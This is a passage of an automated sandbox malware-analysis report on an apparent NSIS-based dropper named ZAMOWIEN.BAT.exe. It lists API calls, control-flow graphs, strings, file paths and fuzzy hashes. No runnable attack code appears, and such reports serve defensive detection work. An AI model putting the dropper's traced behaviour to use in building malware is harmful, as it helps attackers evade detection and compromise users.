                                                                                  • Opcode Fuzzy Hash: d7a422a1aef06f55577592658d1c21977668bb8039ea8e57eb2cb6bab4ff21c4
                                                                                  • Instruction Fuzzy Hash: 0641B530A00914AACB21BB658C89BAF7778EF45729F60427FF801711D1D7BC5981DEAE
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,00426738,00425EF0,00405CAA,00425EF0,00425EF0,00000000,00425EF0,00425EF0,?,?,764A3420,004059B6,?,C:\Users\user\AppData\Local\Temp\,764A3420), ref: 004065D2
                                                                                  • FindClose.KERNEL32(00000000), ref: 004065DE
                                                                                  Similarity
                                                                                  • API ID: Find$CloseFileFirst
                                                                                  • String ID: 8gB
                                                                                  • API String ID: 2295610775-1733800166
                                                                                  • Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                  • Instruction ID: 17231fcebe31093dbb05a9ce9100934524038fc54cbd693a8662f86860803725
                                                                                  • Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
                                                                                  • Instruction Fuzzy Hash: 46D012315450206BC60517387D0C84BBA589F653357128A37F466F51E4C734CC628698
                                                                                  APIs
                                                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E67
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E72
                                                                                  Similarity
                                                                                  • API ID: Window$EnableShow
                                                                                  • String ID:
                                                                                  • API String ID: 1136574915-0
                                                                                  • Opcode ID: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                                  • Instruction ID: 63871ab535fe988d3adb25008cf832d4d85dc6cfcdc2aab035335d2457ba8122
                                                                                  • Opcode Fuzzy Hash: f0df3e05e3b5ed1159a39937c9662c58851a2e21ea47a233f3ab8e4485993ad4
                                                                                  • Instruction Fuzzy Hash: 2BE0D832E08200CFE724DFA5AA4946D77B4EB80314720447FF201F11D1CE7848418F6D

                                                                                  [Control-flow graph of function 00403D22; legend: Executed / Not Executed]
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
                                                                                  • ShowWindow.USER32(?), ref: 00403D7B
                                                                                  • DestroyWindow.USER32 ref: 00403D8F
                                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
                                                                                  • GetDlgItem.USER32(?,?), ref: 00403DCC
                                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
                                                                                  • IsWindowEnabled.USER32(00000000), ref: 00403DE7
                                                                                  • GetDlgItem.USER32(?,?), ref: 00403E95
                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00403E9F
                                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
                                                                                  • SendMessageW.USER32(0000040F,00000000,?,?), ref: 00403F0A
                                                                                  • GetDlgItem.USER32(?,00000003), ref: 00403FB0
                                                                                  • ShowWindow.USER32(00000000,?), ref: 00403FD1
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FE3
                                                                                  • EnableWindow.USER32(?,?), ref: 00403FFE
                                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00404014
                                                                                  • EnableMenuItem.USER32(00000000), ref: 0040401B
                                                                                  • SendMessageW.USER32(?,000000F4,00000000,?), ref: 00404033
                                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
                                                                                  • lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
                                                                                  • SetWindowTextW.USER32(?,004236E8), ref: 00404084
                                                                                  • ShowWindow.USER32(?,0000000A), ref: 004041B8
                                                                                  Similarity
                                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                  • String ID: 6B
                                                                                  • API String ID: 3282139019-4127139157
                                                                                  • Opcode ID: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                  • Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
                                                                                  • Opcode Fuzzy Hash: 5b048d91d045b384b87ea39b7222d66b7397b759a9202294a9cfb78e4cfd3030
                                                                                  • Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

                                                                                  [Control-flow graph of function 00403974; legend: Executed / Not Executed]
                                                                                  APIs
                                                                                    • Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
                                                                                    • Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B
                                                                                  • lstrcatW.KERNEL32(1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,764A3420,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00000000), ref: 004039F5
                                                                                  • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A75
                                                                                  • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,1033,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
                                                                                  • GetFileAttributesW.KERNEL32(Call), ref: 00403A93
                                                                                  • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness), ref: 00403ADC
                                                                                    • Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8
                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403B19
                                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
                                                                                  • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B9C
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
                                                                                  • GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
                                                                                  • RegisterClassW.USER32(004291A0), ref: 00403BDE
                                                                                  • DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
                                                                                  • API String ID: 1975747703-3427577969
                                                                                  • Opcode ID: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                  • Instruction ID: ac693f2390e271b0591ead3bca04d252cd9040af8bb9d400f005d771bc7483c2
                                                                                  • Opcode Fuzzy Hash: c728dd09fb0e724f558f784f5036d96df1f6ce9e2e9f1b64a51f93e144120454
                                                                                  • Instruction Fuzzy Hash: 0D61B770244600BFE630AF269D46F273A6CEB44B45F40057EF985B62E2DB7D5911CA2D

                                                                                  Control-flow Graph

                                                                                  • Function at 402edd; nodes are marked Executed or Not Executed
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                    • Part of subcall function 00405D7A: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D7E
                                                                                    • Part of subcall function 00405D7A: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DA0
                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\ZAMOWIEN.BAT.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                  • API String ID: 4283519449-670930626
                                                                                  • Opcode ID: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                  • Instruction ID: 8370a5f95b7ae461dcbe38738d17cc5e552d4c17a0c1bed0763bf9a4eadef116
                                                                                  • Opcode Fuzzy Hash: 267abab7d79e74cef5e3127b9650355ecd25f4611b06b3885a53204473977592
                                                                                  • Instruction Fuzzy Hash: FF51D171901204AFDB20AF65DD85B9E7FA8EB04319F14417BF904B72D5C7788E818BAD

                                                                                  Control-flow Graph

                                                                                  • Function at 4062a6; nodes are marked Executed or Not Executed
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063E7
                                                                                  • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 004063FA
                                                                                  • SHGetSpecialFolderLocation.SHELL32(00405323,00410EA0,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 00406436
                                                                                  • SHGetPathFromIDListW.SHELL32(00410EA0,Call), ref: 00406444
                                                                                  • CoTaskMemFree.OLE32(00410EA0), ref: 0040644F
                                                                                  • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406475
                                                                                  • lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,?,00405323,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000), ref: 004064CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                  • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                  • API String ID: 717251189-848795675
                                                                                  • Opcode ID: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                  • Instruction ID: 605843c2509a57f6f3c23207e2b9262681d5cb504286618bc70e882f3b2b38d7
                                                                                  • Opcode Fuzzy Hash: dd46a77467dc7c45da866f78f431b637c84e84ab5556cb2168e2007360d71072
                                                                                  • Instruction Fuzzy Hash: 2C611171A00215ABDF209F64CC40AAE37A5AF54314F22813FE947BB2D0D77D5AA2CB5D

                                                                                  Control-flow Graph

                                                                                  • Function at 40176f; nodes are marked Executed or Not Executed
                                                                                  APIs
                                                                                  • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,?,00000031), ref: 004017B0
                                                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness,?,?,00000031), ref: 004017D5
                                                                                    • Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                    • Part of subcall function 004052EC: lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                    • Part of subcall function 004052EC: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                    • Part of subcall function 004052EC: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                    • Part of subcall function 004052EC: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp$C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call
                                                                                  • API String ID: 1941528284-4113197364
                                                                                  • Opcode ID: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                  • Instruction ID: 128eea75dfaaf3eda36781b62dd3037428c7b97943fe82b2985fb16c69cf4114
                                                                                  • Opcode Fuzzy Hash: b281b56859217cd12faca26e4537830f2bf9983139c1f988b18464fa74c6c1d9
                                                                                  • Instruction Fuzzy Hash: C541A031900519BFCF10BBA5CD46EAE3679EF45328B20427FF412B10E1CA3C8A519A6E

                                                                                  Control-flow Graph

                                                                                  • Function at 4052ec; nodes are marked Executed or Not Executed
                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000,?), ref: 00405324
                                                                                  • lstrlenW.KERNEL32(0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0,?,?,?,?,?,?,?,?,?,0040324F,00000000), ref: 00405334
                                                                                  • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,0040324F,0040324F,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,00000000,00410EA0,004030B0), ref: 00405347
                                                                                  • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll), ref: 00405359
                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040537F
                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405399
                                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.33320291711.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320404991.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320475606.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.33320898956.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                  • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsc6AE1.tmp\System.dll
                                                                                  • API String ID: 2531174081-3173602412
                                                                                  • Opcode ID: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                  • Instruction ID: 5cbdc996bc9841dedcc8c590482a37e7ed43af3164ff52369f5afd8429117419
                                                                                  • Opcode Fuzzy Hash: f62b684c0e6f289dd6bb465d0f12a75b041ce70bd46b314235ddfc122f96f8a0
                                                                                  • Instruction Fuzzy Hash: FA219D71900618BBDB11AF96DD849CFBF78EF45354F50807AF904B62A0C3B94A50CFA8

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 643 40264a-402663 call 402c1f 646 402ac5-402ac8 643->646 647 402669-402670 643->647 650 402ace-402ad4 646->650 648 402672 647->648 649 402675-402678 647->649 648->649 651 4027dc-4027e4 649->651 652 40267e-40268d call 4061e4 649->652 651->646 652->651 656 402693 652->656 657 402699-40269d 656->657 658 402732-402735 657->658 659 4026a3-4026be ReadFile 657->659 660 402737-40273a 658->660 661 40274d-40275d call 405dfd 658->661 659->651 662 4026c4-4026c9 659->662 660->661 663 40273c-402747 call 405e5b 660->663 661->651 672 40275f 661->672 662->651 665 4026cf-4026dd 662->665 663->651 663->661 668 4026e3-4026f5 MultiByteToWideChar 665->668 669 402798-4027a4 call 4061cb 665->669 668->672 673 4026f7-4026fa 668->673 669->650 675 402762-402765 672->675 676 4026fc-402707 673->676 675->669 677 402767-40276c 675->677 676->675 678 402709-40272e SetFilePointer MultiByteToWideChar 676->678 679 4027a9-4027ad 677->679 680 40276e-402773 677->680 678->676 681 402730 678->681 682 4027ca-4027d6 SetFilePointer 679->682 683 4027af-4027b3 679->683 680->679 684 402775-402788 680->684 681->672 682->651 685 4027b5-4027b9 683->685 686 4027bb-4027c8 683->686 684->651 687 40278a-402790 684->687 685->682 685->686 686->651 687->657 688 402796 687->688 688->651
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                                  • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                                    • Part of subcall function 00405E5B: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405E71
                                                                                  • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                  • String ID: 9
                                                                                  • API String ID: 163830602-2366072709
                                                                                  • Opcode ID: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                  • Instruction ID: 3d8386ac743f87b5a59d0c6af2c48158715b6bf8f4fdb2ba716f86882e7a1e00
                                                                                  • Opcode Fuzzy Hash: c1a2398a3cf68ffccba9bba39206efc2048042628f08e4a72376123c44d13fd0
                                                                                  • Instruction Fuzzy Hash: 46510A74D10219AEDF219F95DA88AAEB779FF04304F50443BE901F72D1D7B49982CB58

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 689 4065ee-40660e GetSystemDirectoryW 690 406610 689->690 691 406612-406614 689->691 690->691 692 406625-406627 691->692 693 406616-40661f 691->693 695 406628-40665b wsprintfW LoadLibraryExW 692->695 693->692 694 406621-406623 693->694 694->695
                                                                                  APIs
                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406605
                                                                                  • wsprintfW.USER32 ref: 00406640
                                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406654
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                                  • API String ID: 2200240437-1946221925
                                                                                  • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                  • Instruction ID: 0a3accc906e0554885a7c349f3439cc1632e9825758041c21a8046ddc9b1cf8d
                                                                                  • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                                  • Instruction Fuzzy Hash: 28F0217050111967CB10EB64DD0DFAB3B6CA700304F10487AA547F10D1EBBDDB64CB98

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 696 403116-40312d 697 403136-40313e 696->697 698 40312f 696->698 699 403140 697->699 700 403145-40314a 697->700 698->697 699->700 701 40315a-403167 call 4032fb 700->701 702 40314c-403155 call 403311 700->702 706 4032b2 701->706 707 40316d-403171 701->707 702->701 710 4032b4-4032b5 706->710 708 403177-403197 GetTickCount call 4067bf 707->708 709 40329b-40329d 707->709 720 4032f1 708->720 722 40319d-4031a5 708->722 711 4032e6-4032ea 709->711 712 40329f-4032a2 709->712 714 4032f4-4032f8 710->714 715 4032b7-4032bd 711->715 716 4032ec 711->716 717 4032a4 712->717 718 4032a7-4032b0 call 4032fb 712->718 723 4032c2-4032d0 call 4032fb 715->723 724 4032bf 715->724 716->720 717->718 718->706 729 4032ee 718->729 720->714 726 4031a7 722->726 727 4031aa-4031b8 call 4032fb 722->727 723->706 733 4032d2-4032de call 405e2c 723->733 724->723 726->727 727->706 734 4031be-4031c7 727->734 729->720 738 4032e0-4032e3 733->738 739 403297-403299 733->739 736 4031cd-4031ea call 4067df 734->736 742 4031f0-403207 GetTickCount 736->742 743 403293-403295 736->743 738->711 739->710 744 403252-403254 742->744 745 403209-403211 742->745 743->710 746 403256-40325a 744->746 747 403287-40328b 744->747 748 403213-403217 745->748 749 403219-40324a MulDiv wsprintfW call 4052ec 745->749 751 40325c-403261 call 405e2c 746->751 752 40326f-403275 746->752 747->722 753 403291 747->753 748->744 748->749 754 40324f 749->754 757 403266-403268 751->757 756 40327b-40327f 752->756 753->720 754->744 756->736 758 403285 756->758 757->739 759 40326a-40326d 757->759 758->720 759->756
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountTick$wsprintf
                                                                                  • String ID: ... %d%%
                                                                                  • API String ID: 551687249-2449383134
                                                                                  • Opcode ID: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                  • Instruction ID: eb9965c025c0ad248c1811abffb3300191da1be904cace2ded6344ef59bce26d
                                                                                  • Opcode Fuzzy Hash: 557a710098fc5fea4fad4b99a5744db3c4a6bc79f6805394010e30fec0e2fa40
                                                                                  • Instruction Fuzzy Hash: 97516B71900219EBCB10DF65EA44A9F3BA8AF44766F1441BFFC04B72C1C7789E518BA9

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 760 4057bb-405806 CreateDirectoryW 761 405808-40580a 760->761 762 40580c-405819 GetLastError 760->762 763 405833-405835 761->763 762->763 764 40581b-40582f SetFileSecurityW 762->764 764->761 765 405831 GetLastError 764->765 765->763
                                                                                  APIs
                                                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057FE
                                                                                  • GetLastError.KERNEL32 ref: 00405812
                                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405827
                                                                                  • GetLastError.KERNEL32 ref: 00405831
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                  • String ID: C:\Users\user\Desktop
                                                                                  • API String ID: 3449924974-3370423016
                                                                                  • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                  • Instruction ID: bfe53add753044f5513d0e7cef191a671c10544bda2f5855e72e4bfb682ac43c
                                                                                  • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                                  • Instruction Fuzzy Hash: 14011A72D00619DADF009FA4C9447EFBBB4EF14355F00843AD945B6281DB789658CFE9

                                                                                  Control-flow Graph (legend: Executed / Not Executed)
                                                                                  control_flow_graph 766 405da9-405db5 767 405db6-405dea GetTickCount GetTempFileNameW 766->767 768 405df9-405dfb 767->768 769 405dec-405dee 767->769 771 405df3-405df6 768->771 769->767 770 405df0 769->770 770->771
                                                                                  APIs
                                                                                  • GetTickCount.KERNEL32 ref: 00405DC7
                                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\ZAMOWIEN.BAT.exe",00403357,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,764A3420,004035A3), ref: 00405DE2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.33320346660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd
                                                                                  Similarity
                                                                                  • API ID: CountFileNameTempTick
                                                                                  • String ID: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                  • API String ID: 1716503409-1791540020
                                                                                  • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                                  • Instruction ID: 8d675393d4be3a1a13ee7cec111603dd999094634a9ab4ae6aafa5463bef85a0
                                                                                  • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
